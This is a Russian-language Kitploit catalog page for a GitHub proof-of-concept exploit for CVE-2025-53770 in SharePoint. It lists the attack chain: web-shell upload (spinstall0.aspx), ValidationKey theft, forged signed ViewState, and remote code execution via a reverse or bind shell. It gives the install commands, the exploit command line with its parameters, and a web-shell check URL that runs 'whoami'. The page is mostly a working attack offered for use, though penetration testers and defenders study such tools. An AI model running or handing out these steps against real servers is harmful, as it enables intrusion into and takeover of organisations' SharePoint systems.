Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Toolshell_CVE-2025-53770 — Эксплойт PoC для CVE-2025-53770, обеспечивающий загрузку веб-шелла в SharePoint, извлечение ValidationKey, генерацию подписанного ViewState и удаленное выполнение кода через обратный или прямой шелл. | Kitploit
Инструменты/GitHubGitHub/greenforcenetworks/toolshell_cve-2025-53770
Генерация полезной нагрузкиЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеRed TeamingИнструмент Удаленного Доступа
GitHubgreenforcenetworks/toolshell_cve-2025-53770

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Toolshell_CVE-2025-53770

Эксплойт PoC для CVE-2025-53770, обеспечивающий загрузку веб-шелла в SharePoint, извлечение ValidationKey, генерацию подписанного ViewState и удаленное выполнение кода через обратный или прямой шелл.

Репозиторий
1 год назадЕщё не проверено

ToolShell → CVE‑2025‑53770 Exploit PoC

Этот пакет позволяет:

  1. Загрузить веб-шелл в SharePoint
  2. Извлечь ValidationKey
  3. Сгенерировать подписанный ViewState
  4. RCE через reverse/bind shell

🔧 Установка

root@kitploit:~
git clone <this-repo>
cd toolshell-exploit
pip3 install -r requirements.txt

🤖 Запуск

Загрузите веб-шелл

Со страницы SharePoint вы можете получить доступ к исходному коду страницы. Просто перейдите на вкладку просмотра исходного кода и, если там доступно, вы получите следующее, что можно скопировать:

A) __VIEWSTATEGENERATOR

B) __EVENTVALIDATION

C) (любой текущий __VIEWSTATE для контекста)

root@kitploit:~

python3 toolshell_exploit.py \
  --target https://sharepoint.local \
  --viewstate "<any_BASE64_VIEWSTATE>" \
  --generator "<VIEWSTATEGENERATOR>" \
  --eventval "<EVENTVALIDATION>"

Это загружает spinstall0.aspx. Проверка: https://sharepoint.local/_layouts/15/spinstall0.aspx?cmd=whoami

Скачать инструмент